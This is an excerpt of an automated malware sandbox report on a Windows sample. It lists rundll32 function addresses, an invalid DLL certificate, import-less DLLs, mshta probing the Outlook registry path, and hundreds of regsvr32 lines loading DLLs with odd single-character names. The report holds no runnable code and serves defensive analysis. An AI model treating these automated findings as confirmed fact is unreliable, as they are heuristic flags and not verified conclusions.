Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F135A88		38_2_000001C73F135A88
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F120EC4		38_2_000001C73F120EC4
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F117ED8		38_2_000001C73F117ED8
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F137EDC		38_2_000001C73F137EDC
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12051C		38_2_000001C73F12051C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F118D2C		38_2_000001C73F118D2C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F13654C		38_2_000001C73F13654C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F13117C		38_2_000001C73F13117C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12096B		38_2_000001C73F12096B
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F11A1A0		38_2_000001C73F11A1A0
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F1331A4		38_2_000001C73F1331A4
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F11FDD8		38_2_000001C73F11FDD8

PE / OLE file has an invalid certificate

Source: 5fbce6bbc8cc4png.dll

Static PE information: invalid certificate

PE file does not import any functions

Source: ncwpagzn.dll.29.dr	Static PE information: No import functions for PE file found
Source: 1rpmo52x.dll.27.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: | .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
